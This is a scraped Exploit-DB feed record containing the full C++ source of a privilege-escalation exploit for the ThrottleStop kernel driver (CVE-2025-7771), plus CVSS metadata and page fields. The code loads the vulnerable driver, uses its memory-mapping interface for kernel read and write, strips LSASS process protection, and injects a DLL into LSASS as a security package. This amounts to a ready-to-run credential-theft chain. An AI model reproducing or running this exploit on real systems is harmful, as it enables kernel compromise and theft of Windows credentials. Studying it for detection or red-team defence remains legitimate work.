{“lastseen”:”2026-04-22T13:27:57″,”description”:”Exploit Title: Throttlestop Kernel Driver – Kernel Out-of-Bounds Write Privilege Escalation Exploit Details: https:\/\/xavibel.com\/2025\/12\/22\/using-vulnerable-drivers-in-red-team-exercises\/ Date: 8\/12\/2025 Exploit Author: Xavi Beltran Vendor Homepage:…”,”published”:”2026-04-22T00:00:00″,”modified”:”2026-04-22T00:00:00″,”type”:”exploitdb”,”title”:”Throttlestop Kernel Driver – Kernel Out-of-Bounds Write Privilege Escalation”,”source”:””,”references”:””,”id”:”EDB-ID:52512″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-7771″],”sourceData”:”# Exploit Title: Throttlestop Kernel Driver – Kernel Out-of-Bounds Write Privilege Escalation \\r\\n# Exploit Details: https:\/\/xavibel.com\/2025\/12\/22\/using-vulnerable-drivers-in-red-team-exercises\/\\r\\n# Date: 8\/12\/2025\\r\\n# Exploit Author: Xavi Beltran\\r\\n# Vendor Homepage: https:\/\/www.techpowerup.com\/download\/techpowerup-throttlestop\/\\r\\n# Version: 3.0.0.0\\r\\n# Tested on: Windows 11\\r\\n# CVE-2025-7771\\r\\n\\r\\n#define WIN32_NO_STATUS\\r\\n#define SECURITY_WIN32\\r\\n#include \\u003cWindows.h\\u003e\\r\\n#include \\u003cPsapi.h\\u003e\\r\\n#include \\u003csuperfetch\/superfetch.h\\u003e\\r\\n#include \\u003ctlhelp32.h\\u003e\\r\\n#include \\u003cstring\\u003e\\r\\n#include \\u003csspi.h\\u003e\\r\\n\\r\\n# define IOCTL_MMMAPIOSPACE 0x8000645C\\r\\n#pragma comment(lib, \\”Secur32.lib\\”)\\r\\n\\r\\n#pragma pack(push,1)\\r\\ntypedef struct {\\r\\n ULONGLONG PhysicalAddress; \/\/ +0\\r\\n DWORD NumberOfBytes; \/\/ +8\\r\\n} PHYS_REQ; \/\/ 0x0C\\r\\n#pragma pack(pop)\\r\\n\\r\\n\/\/ Struct needed to call nt!NtQueryIntervalProfile\\r\\ntypedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);\\r\\n\\r\\nLPVOID GetBaseAddr(LPCWSTR drvname)\\r\\n{\\r\\n LPVOID drivers[1024];\\r\\n DWORD cbNeeded;\\r\\n int nDrivers, i = 0;\\r\\n if (EnumDeviceDrivers(drivers, sizeof(drivers), \\u0026cbNeeded) \\u0026\\u0026 cbNeeded \\u003c sizeof(drivers))\\r\\n {\\r\\n WCHAR szDrivers[1024];\\r\\n nDrivers = cbNeeded \/ sizeof(drivers[0]);\\r\\n for (i = 0; i \\u003c nDrivers; i++)\\r\\n {\\r\\n if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) \/ sizeof(szDrivers[0])))\\r\\n {\\r\\n if (wcscmp(szDrivers, drvname) == 0)\\r\\n {\\r\\n return drivers[i];\\r\\n }\\r\\n }\\r\\n }\\r\\n }\\r\\n return 0;\\r\\n}\\r\\n\\r\\nuint64_t xRead(HANDLE hDrv, uint64_t virt_addr) {\\r\\n auto mm = spf::memory_map::current();\\r\\n if (!mm) {\\r\\n printf(\\”[!] Superfetch init failed!\\\\n\\”);\\r\\n return 0;\\r\\n }\\r\\n\\r\\n auto phys = mm-\\u003etranslate((void*)virt_addr);\\r\\n if (!phys) {\\r\\n printf(\\”[!] Translate failed for VA %p!\\\\n\\”, (void*)virt_addr);\\r\\n return 0;\\r\\n }\\r\\n\\r\\n \/\/printf(\\”[+] Virtual Adress=0x%016llx -\\u003e Physical Address 0x%016llx\\\\n\\”, virt_addr, phys);\\r\\n \/\/ — PHYSICAL READ —\\r\\n PHYS_REQ in{};\\r\\n in.PhysicalAddress = phys;\\r\\n in.NumberOfBytes = 0x8;\\r\\n ULONGLONG out = 0;\\r\\n DWORD br = 0;\\r\\n BOOL ok = DeviceIoControl(hDrv,\\r\\n IOCTL_MMMAPIOSPACE,\\r\\n \\u0026in, sizeof(in), \/\/ 0x0C\\r\\n \\u0026out, sizeof(out), \/\/ Accepts 4 or 8\\r\\n \\u0026br, nullptr);\\r\\n\\r\\n \/\/printf(\\”[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\\\\n\\”, ok, br, GetLastError(), (unsigned long long)out);\\r\\n if (ok \\u0026\\u0026 br == 8 \\u0026\\u0026 out) {\\r\\n ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; \/\/ 8 bytes exactos\\r\\n printf(\\”[+] READ WHERE: 0x%016llx | CONTENT: 0x%016llx\\\\n\\”, (unsigned long long)virt_addr, (unsigned long long)result);\\r\\n return result;\\r\\n }\\r\\n\\r\\n return -1;\\r\\n}\\r\\n\\r\\nuint64_t xWrite(HANDLE hDrv, uint64_t where, uint64_t what) {\\r\\n auto mm = spf::memory_map::current();\\r\\n if (!mm) {\\r\\n printf(\\”[!] Superfetch init failed!\\\\n\\”);\\r\\n return 0;\\r\\n }\\r\\n\\r\\n auto phys = mm-\\u003etranslate((void*)where);\\r\\n if (!phys) {\\r\\n printf(\\”[!] Translate failed for VA %p!\\\\n\\”, (void*)where);\\r\\n return 0;\\r\\n }\\r\\n\\r\\n \/\/printf(\\”[+] Virtual Adress=0x%016llx -\\u003e Physical Address 0x%016llx\\\\n\\”, where, phys);\\r\\n PHYS_REQ in{};\\r\\n in.PhysicalAddress = phys;\\r\\n in.NumberOfBytes = 0x8;\\r\\n ULONGLONG out = 0;\\r\\n DWORD br = 0;\\r\\n BOOL ok = DeviceIoControl(hDrv,\\r\\n IOCTL_MMMAPIOSPACE,\\r\\n \\u0026in, sizeof(in), \/\/ 0x0C\\r\\n \\u0026out, sizeof(out), \/\/ 8 (Accepts 4 or 8)\\r\\n \\u0026br, nullptr);\\r\\n\\r\\n \/\/printf(\\”[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\\\\n\\”, ok, br, GetLastError(), (unsigned long long)out);\\r\\n if (ok \\u0026\\u0026 br == 8 \\u0026\\u0026 out) {\\r\\n ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; \/\/ 8 bytes exactos\\r\\n }\\r\\n\\r\\n \/\/ WRITE\\r\\n printf(\\”[+] WRITE WHAT: 0x%016llx | WHERE: 0x%016llx\\\\n\\”, (unsigned long long)what, (unsigned long long)where);\\r\\n *(uint64_t*)out = what;\\r\\n return 0;\\r\\n}\\r\\n\\r\\nDWORD FindProcessId(const std::wstring\\u0026 processName) {\\r\\n DWORD processId = 0;\\r\\n HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\\r\\n if (snapshot == INVALID_HANDLE_VALUE)\\r\\n return 0;\\r\\n\\r\\n PROCESSENTRY32W entry;\\r\\n entry.dwSize = sizeof(PROCESSENTRY32W);\\r\\n\\r\\n if (Process32FirstW(snapshot, \\u0026entry)) {\\r\\n do {\\r\\n if (!_wcsicmp(entry.szExeFile, processName.c_str())) {\\r\\n processId = entry.th32ProcessID;\\r\\n break;\\r\\n }\\r\\n } while (Process32NextW(snapshot, \\u0026entry));\\r\\n }\\r\\n\\r\\n CloseHandle(snapshot);\\r\\n return processId;\\r\\n}\\r\\n\\r\\n\\r\\nint main()\\r\\n{\\r\\n DWORD lsassPid = FindProcessId(L\\”lsass.exe\\”);\\r\\n printf(\\”[+] Target process PID: %d\\\\n\\”, lsassPid);\\r\\n \/\/Installing the service\\r\\n\\r\\n SC_HANDLE hSCManager;\\r\\n SC_HANDLE hService;\\r\\n\\r\\n \/\/ Open the Service Control Manager\\r\\n hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);\\r\\n if (hSCManager == NULL) {\\r\\n printf(\\”[!] Error opening SCM: %lu\\\\n\\”, GetLastError());\\r\\n return 1;\\r\\n }\\r\\n\\r\\n \/\/ Create the service\\r\\n hService = CreateService(\\r\\n hSCManager, \\r\\n L\\”ThrottleStop\\”, \\r\\n L\\”ThrottleStop\\”, \\r\\n SERVICE_ALL_ACCESS, \\r\\n SERVICE_KERNEL_DRIVER, \\r\\n SERVICE_AUTO_START, \\r\\n SERVICE_ERROR_NORMAL, \\r\\n L\\”C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\a.sys\\”,\\r\\n NULL, NULL, NULL, NULL, NULL);\\r\\n\\r\\n if (hService == NULL) {\\r\\n printf(\\”[+] Error creating service: %lu\\\\n\\”, GetLastError());\\r\\n CloseServiceHandle(hSCManager);\\r\\n \/\/return 1;\\r\\n }\\r\\n\\r\\n printf(\\”[!] Service created successfully.\\\\n\\”);\\r\\n\\r\\n if (!StartService(hService, 0, NULL)) {\\r\\n printf(\\”[!] Error starting the service: %lu\\\\n\\”, GetLastError());\\r\\n }\\r\\n else {\\r\\n printf(\\”[+] Service started correctly.\\\\n\\”);\\r\\n }\\r\\n\\r\\n LPVOID nt_base = GetBaseAddr(L\\”ntoskrnl.exe\\”);\\r\\n printf(\\”[+] NT base: %p\\\\n\\”, nt_base);\\r\\n\\r\\n HANDLE hDrv = NULL;\\r\\n hDrv = CreateFileA(\\”\\\\\\\\\\\\\\\\.\\\\\\\\ThrottleStop\\”,\\r\\n (GENERIC_READ | GENERIC_WRITE),\\r\\n 0x00,\\r\\n NULL,\\r\\n OPEN_EXISTING,\\r\\n FILE_ATTRIBUTE_NORMAL,\\r\\n NULL);\\r\\n\\r\\n if (hDrv == INVALID_HANDLE_VALUE)\\r\\n {\\r\\n printf(\\”[-] Failed to get a handle on driver!\\\\n\\”);\\r\\n return -1;\\r\\n }\\r\\n else {\\r\\n printf(\\”[+] Handle on driver received!\\\\n\\”);\\r\\n }\\r\\n\\r\\n ULONGLONG result = 0x0;\\r\\n\\r\\n \/\/ nt!PsInitialSystemProcess nt + 0x5412e0\\r\\n ULONGLONG system_eprocess = ULONGLONG(nt_base) + 0x5412e0;\\r\\n\\r\\n DWORD64 Eprocess = xRead(hDrv, (uint64_t)system_eprocess);\\r\\n printf(\\”[+] EPROCESS: 0x%llX\\\\n\\”, Eprocess);\\r\\n DWORD64 CurrentProcessPid = xRead(hDrv, (uint64_t)system_eprocess + 0x2e0); \/\/ +0x2e0 UniqueProcessId : Ptr64 Void\\r\\n\\r\\n DWORD64 SearchProcessPid = 0;\\r\\n DWORD64 searchEprocess = Eprocess;\\r\\n while (1)\\r\\n {\\r\\n searchEprocess = xRead(hDrv, (uint64_t)searchEprocess + 0x2e8) – 0x2e8; \/\/ +0x2e8 ActiveProcessLinks : _LIST_ENTRY\\r\\n SearchProcessPid = xRead(hDrv, (uint64_t)searchEprocess + 0x2e0); \/\/ +0x2e0 UniqueProcessId : Ptr64 Void\\r\\n if (SearchProcessPid == lsassPid) \/\/ LSASS PROCESS\\r\\n {\\r\\n break;\\r\\n }\\r\\n }\\r\\n\\r\\n printf(\\”[+] Found LSASS EPROCESS!\\\\n\\”);\\r\\n printf(\\”[+] Removing PPL Protection…\\\\n\\”);\\r\\n xWrite(hDrv, (uint64_t)searchEprocess + 0x6ca, 0x0); \/\/ +0x6ca Protection : _PS_PROTECTION\\r\\n printf(\\”[+] Removing Signature Level Protection…\\\\n\\”);\\r\\n xWrite(hDrv, (uint64_t)searchEprocess + 0x6c8, 0x0);\/\/ +0x6c8 Protection : SignatureLevel : UChar\\r\\n printf(\\”[+] LSASS protections disabled\\\\n\\”);\\r\\n CloseHandle(hDrv);\\r\\n\\r\\n SECURITY_PACKAGE_OPTIONS spo = {};\\r\\n SECURITY_STATUS ss = AddSecurityPackageA((LPSTR)\\”c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\ntssp.dll\\”, \\u0026spo);\\r\\n printf(\\”[+] DLL Injection successful!\\\\n\\”);\\r\\n\\r\\n return 0;\\r\\n}”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52512″,”cvss”:{“score”:8.7,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:L\/AC:H\/AT:N\/PR:H\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52512″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-22T13:27:57″,”description”:”Exploit Title: Throttlestop Kernel Driver – Kernel Out-of-Bounds Write Privilege Escalation Exploit Details: https:\/\/xavibel.com\/2025\/12\/22\/using-vulnerable-drivers-in-red-team-exercises\/ Date: 8\/12\/2025 Exploit Author: Xavi Beltran Vendor Homepage:…”,”published”:”2026-04-22T00:00:00″,”modified”:”2026-04-22T00:00:00″,”type”:”exploitdb”,”title”:”Throttlestop Kernel Driver –…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,40,15,13,7,11,5],"class_list":["post-48694","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n